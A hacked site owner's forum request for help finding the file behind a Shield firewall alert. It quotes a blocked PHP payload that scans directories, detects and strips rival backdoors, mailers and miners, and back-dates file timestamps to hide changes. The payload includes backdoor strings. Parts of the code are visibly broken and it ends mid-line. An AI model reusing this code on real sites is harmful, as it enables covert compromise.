Help after being hacked

Hi,

May website was recently hacked. I thought I had cleaned everything up, but I keep getting this notification in Sheild. How can I locate the file that is causing this?

Page parameter failed firewall check. The offending parameter was \”p1\” with a value of \”@ini_set(\’error_log\’, NULL);\n@ini_set(\’log_errors\’, 0);\n@ini_set(\’max_execution_time\’, 0);\n@error_reporting(0);\n@set_time_limit(0);\n\nfunction list_dir($dir)\n{\n $res = Array();\n\n $dir = strlen($dir) == 1 ? $dir : rtrim($dir, \’\\\\/\’);\n $h = @opendir($dir);\n if ($h === FALSE) {\n return $res;\n }\n\n while (($f = readdir($h)) !== FALSE) {\n if ($f !== \’.\’ and $f !== \’..\’) {\n $res[] = \”$dir/$f\”;\n\n }\n }\n closedir($h);\n\n return $res;\n}\n\nfunction cut_by_markers($content, $start_marker, $end_marker)\n{\n while (($start_marker_pos = strpos($content, $start_marker)) !== FALSE) {\n $end_marker_pos = strpos($content, $end_marker, $start_marker_pos + strlen($start_marker));\n\n if ($end_marker_pos == FALSE) {\n break;\n }\n\n $end_marker_pos += strlen($end_marker);\n $content = str_replace(substr($content, $start_marker_pos, $end_marker_pos – $start_marker_pos), \”\”, $content);\n }\n\n return $content;\n}\n\nfunction GetDirectoryList($dir, $depth = 10000)\n{\n $result = Array();\n $dir_count = 0;\n\n if ($depth == 0) {\n return $result;\n }\n\n foreach (list_dir($dir) as $item) {\n if (is_dir($item)) {\n $dir_count += 1;\n\n if ($dir_count >= $depth) {\n break;\n }\n\n $result[] = $item;\n $result = array_merge($result, GetDirectoryList($item, $depth / 10));\n }\n }\n\n return $result;\n}\n\nfunction process_x225_inj($path)\n{\nreturn;\n $payloads = Array();\n\n $content_arr = @file($path);\n if (empty($content_arr)) {\n return;\n }\n\n $content_arr = array_slice($content_arr, 0, 2);\n for ($i = 0; $i <= 1; $i++) {\n if (!isset($content_arr[$i])) {\n break;\n }\n\n $str = $content_arr[$i];\n if (strlen($str) < 40) {\n continue;\n }\n\n $content2 = str_replace(\”\\\”\”, \”\”, $str);\n $content2 = str_replace(\”.\”, \”\”, $content2);\n $content2 = str_replace(\”\’\”, \”\”, $content2);\n\n if ((strpos($content2, \”_REQUEST\”) !== FALSE || strpos($content2, \”_POST\”) !== FALSE || strpos($content2, \”_GET\”) !== FALSE || strpos($content2, \”_COOKIE\”) !== FALSE)) {\n#\n $beg = strpos($str, \”if\”);\n if ($beg !== FALSE) {\n $end = strpos($str, \”xit\”, $beg);\n if ($end !== FALSE && ($end – $beg) < 150) {\n $end = strpos($str, \”}\”, $end);\n\n if ($end !== FALSE) {\n $payload = substr($str, $beg, ($end – $beg) + 1);\n if (strpos($payload, \”HTTP/1.0\”) === FALSE) {\n $payloads[] = $payload;\n echo \”FILE!x225 po3\\t\” . $path . \”\\t\” . $payload . PHP_EOL;\n }\n }\n }\n }\n\n if (strpos($str, \”<\”, $str);\n if (count($str) < 2) {\n continue;\n }\n\n $str = $str[1];\n\n $beg = strpos($str, \”if\”);\n if ($beg !== FALSE) {\n $end = strpos($str, \”xit\”, $beg);\n if ($end !== FALSE && ($end – $beg) < 150) {\n $end = strpos($str, \”}\”, $end);\n\n if ($end !== FALSE) {\n $payload = substr($str, $beg, ($end – $beg) + 1);\n if (strpos($payload, \”HTTP/1.0\”) === FALSE) {\n $payloads[] = $payload;\n echo \”FILE!x225 po3 sp\\t\” . $path . \”\\t\” . $payload . PHP_EOL;\n }\n }\n }\n }\n }\n }\n }\n\n if (count($payloads)) {\n $content = @file_get_contents($path);\n foreach ($payloads as $needle) {\n $content = str_replace($needle, \”\”, $content);\n }\n\n @file_put_contents($path, $content);\n @touch($path, time() – mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));\n }\n}\n\nfunction check_and_patch($path)\n{\n\n $content = @file_get_contents($path);\n\nif (strpos($content, \”z0=\\$_REQUEST[\’sort\’];\\$q1=\’\’;\\$c2=\\\”wt8m4;\”) !== FALSE)\n{\n echo \”FILE! x240 mod\\t\” . $path . PHP_EOL;\n $content = cut_by_markers($content, \”\\$z0=\\$_REQUEST[\”, \”;?\” . \”>\”);\n @file_put_contents($path, $content);\n @touch($path, time() – mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));\n return FALSE;\n}\n\n if (strpos($content, \”if(\\$_GET[\\\”login\\\”]==\\\”ADONEC\\\”){ echo success\”) !== FALSE)\n {\n echo \”FILE! uploader ADONEC\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”Uploader By Psyco!\”) !== FALSE)\n {\n echo \”FILE! uploader Psyco\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n \n if (strpos($content, \”die(substr(md5(microtime()), rand(0,26), 5).\\$msg);\”) !== FALSE)\n {\n echo \”FILE! uploader php.input\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”aWYgKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddID09PSAnUE9TVCcpIH\”) !== FALSE)\n {\n echo \”FILE! backdoor plain payload\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”_\\$(edocne_46esab\”) !== FALSE && strpos($content, \”_\\$(edoced_46esab\”) !== FALSE)\n {\n echo \”FILE! protected backdoor\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”if (isset(\\$_GET[\’check_mail_smtp\’])) {\”) !== FALSE && strpos($content, \”SilthxMailer\”) !== FALSE)\n {\n echo \”FILE! mailer Silth\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”Leaf PHP Mailer by [leafmailer.pw]\”) !== FALSE)\n {\n echo \”FILE! mailer leafmailer\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”\’; @eval(\\$\”) !== FALSE && substr_count($content, \”\’.\’\”) > 2000)\n {\n echo \”FILE! bfm crypt\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n\n $sniff1_string = \” 40 && strpos($content, \” \\$\”) !== FALSE) {\n echo \”FILE!x198\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”=str_replace(\\\”[t1]\\\”, \\\” 90000) {\n echo \”FILE!perl unicode wso\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”file_get_contents(\’http://www.google.com/safebrowsing/diagnostic?output=jsonp&amp;\”) !== FALSE) {\n echo \”FILE!pharm redir\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”\\$smtp_passw, \\$email_polucha, \\$telo_pisma, \\$headers);\”) !== FALSE) {\n echo \”FILE!x225 mailer\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”ewogICAgaWYgKCFkZWZpbmVkKCduZXdvOGR3cG9qYXA5Mi0wMzJqZzQzJykpCiAgICB7CiAgIC\”) !== FALSE) {\n echo \”FILE!backdoor 225 snif\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n if (strpos($content, \”ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgielAzbnJ1\”) !== FALSE) {\n echo \”FILE!backdoor comment\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (substr_count($content, \”} . \\$\”) == 36) {\n echo \”FILE!perl wso\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”&api_key=\\$api_key&campaign=xxxcheck&ua=\\$ua&ip=\\$ip&keyword=\”) !== FALSE) {\n echo \”FILE! miner\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”pool.minexmr.com\”) !== FALSE) {\n echo \”FILE! miner\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n $backdoor1 = \”\\$khg= \’_\’.\\\”GE\\\”.\’T\’;if (!empty(\\${\\$khg}[\’15\’])) preg_replace(\’~.*~e\’, \\\”e\\\”.\’V\’.\’al($\’.\\$khg.\'[\\\”15\\\”])\’,\’\’);\”;\n if (strpos($content, $backdoor1) !== FALSE) {\n $content = str_replace($backdoor1, \”\”, $content);\n @file_put_contents($path, $content);\n @touch($path, time() – mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));\n echo \”FILE!x225 emb\\t\” . $path . PHP_EOL;\n return FALSE;\n }\n\n if (strpos($content, \”if(strpos(\\$_REQUEST[\’file2clean\’], \’tell-a-friend.php\’) !== false)\”) !== FALSE) {\n echo \”FILE! backdoor wp\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \” 5) {\n echo \”FILE!PATH backdoor\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”\’PATH\’\”) !== FALSE && substr_count($content, \”_POST\”) >= 4 && strpos($content, \”OS system\”) !== FALSE) {\n echo \”FILE!PATH backdoor2\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”include \\$_SERVER[\\\”DOCUMENT_ROOT\\\”].\\\”/wp-config.php\\\”;\”) !== FALSE) {\n echo \”FILE!db backdoor\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (substr_count($content, \”return \\\”{\\$\”) > 50) {\n echo \”FILE!wso unicode related\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”include \\$_SERVER[\\\”DOCUMENT_ROOT\\\”].\\\”/wp-config.php\\\”;\”) !== FALSE) {\n echo \”FILE!db backdoor\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if ((strpos($content, \”eval\”) !== FALSE || strpos($content, \”preg_replace\”) !== FALSE || strpos($content, \”_REQUEST\”) !== FALSE || strpos($content, \”_PO\”) !== FALSE || strpos($content, \”_CO\”) !== FALSE) && substr_count($content, \”\\n\”) <= 1 && strlen($content) < 200) {\n echo \”FILE!x225 po\\t\” . $path . \”\\t\” . $content . PHP_EOL;\n //patch_file_sniff($path);\n //return FALSE;\n return TRUE;\n }\n\n if (strpos($content, \” }eval(\”) !== FALSE && strpos($content, \”\\$i] = chr(ord(\\$\”) !== FALSE && strpos($content, \”=gzinflate(\\$code($\”) !== FALSE) {\n echo \”FILE!x225 shell\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n $content2 = str_replace(\”\\\”\”, \”\”, $content);\n $content2 = str_replace(\”.\”, \”\”, $content2);\n $content2 = str_replace(\”\’\”, \”\”, $content2);\n\n if ((strpos($content2, \”_REQUEST\”) !== FALSE || strpos($content2, \”_POST\”) !== FALSE || strpos($content2, \”_GET\”) !== FALSE || strpos($content2, \”_COOKIE\”) !== FALSE) && substr_count($content2, \”\\n\”) <= 2 && strlen($content2) < 200) {\n echo \”FILE!x225 po2\\t\” . $path . \”\\t\” . $content . PHP_EOL;\n return TRUE;\n }\n\n if (strlen($content) < 100 && strpos($content, \”@require(\’\”) !== FALSE && strpos($content, \”.php\”) === FALSE) {\n echo \”FILE!doorway4\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”<\” . \”?php @require(\’\”) !== FALSE && FALSE) {\n echo \”FILE!doorway4 patch\\t\” . $path . PHP_EOL;\n $content = str_replace(\”<\” . \”?php @require(\’\”, \”